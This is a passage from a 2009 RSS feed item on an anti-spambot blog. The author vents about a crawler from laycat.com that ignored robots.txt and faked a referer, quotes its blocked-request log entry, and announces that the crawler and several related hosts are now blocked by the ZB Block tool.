  a&amp;#167;&amp;#167;holes, over 2 hours later, and FAKING a http_referer from a protected 
  page no less...
&lt;/p&gt;
&lt;p&gt;
  &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;#: 482 @: Mon, 30 Mar 2009 11:42:48 -0600&lt;br&gt;Host: 
  laycat.com&lt;br&gt;IP: 88.191.79.43&lt;br&gt;Score: 1&lt;br&gt;Why blocked: Exploit 
  probe? Possibly RBN? Claims to be search engine in dev. No 3rd party 
  info on this. Ignores robots.txt.&lt;br&gt;File: removed for security&lt;br&gt;Post:&lt;br&gt;Query:&lt;br&gt;Referer: 
  http://www.spambotsecurity.com/&lt;br&gt;User Agent: Mozilla/4.0 (compatible; 
  MSIE 6.0; Windows NT 5.1)&lt;br&gt;Reconstructed URL: 
  http://www.spambotsecurity.com/zbblock.php &lt;/font&gt;
&lt;/p&gt;
&lt;p&gt;
  Oh, and btw, the same group of nogoodniks just slammed my &lt;a target=&quot;_blank&quot; title=&quot;Michele's Paint Shop, Website Design, and SEO&quot; name=&quot;Michele's Paint Shop, Website Design, and SEO&quot; href=&quot;http://www.michelespaintshop.com&quot;&gt;&lt;font color=&quot;#ff0000&quot;&gt;friend's 
  site&lt;/font&gt;&lt;/a&gt; for 100s of page pulls, in violation of robots.txt too. 
  She's P.O.ed! Hell hath no wrath like a woman's robots.txt scorned.
&lt;/p&gt;
&lt;p&gt;
  Welcome to being labled as pure RBN trash in my blocklists.
&lt;/p&gt;
&lt;p&gt;
  EDIT: I might also mention here, that laycat, kyklo, aceleo, and dedibox 
  are now all blocked by &lt;a title=&quot;ZB Block - Keep the baddies out of your server.&quot; name=&quot;ZB Block - Keep the baddies out of your server.&quot; href=&quot;http://www.spambotsecurity.com/zbblock.php&quot;&gt;&lt;font color=&quot;#ff0000&quot;&gt;ZB 
  Block which can be downloaded for free here.&lt;/font&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
  Zaphod &amp;quot;Some Heads are Gonna Roll&amp;quot; Breeblebrox &lt;img src=&quot;http://www.spambotsecurity.com/forum/images/smilies/longhairhornsup.gif&quot; alt=&quot;Yeah, Judas Priest man!&quot;&gt;
&lt;/p&gt;</description>
<link>http://www.spambotsecurity.com/blog/archives/03-01-2009_03-31-2009.php#18</link>
<guid>http://www.spambotsecurity.com/blog/archives/03-01-2009_03-31-2009.php#18</guid>

<category>Exploit Bot</category>

<category>RBN</category>

<category>Scan Bot</category>

<category>Stupid Bot</category>

<pubDate>Mon, 30 Mar 2009 12:19:40 -0600</pubDate>
</item>

</channel>
</rss>

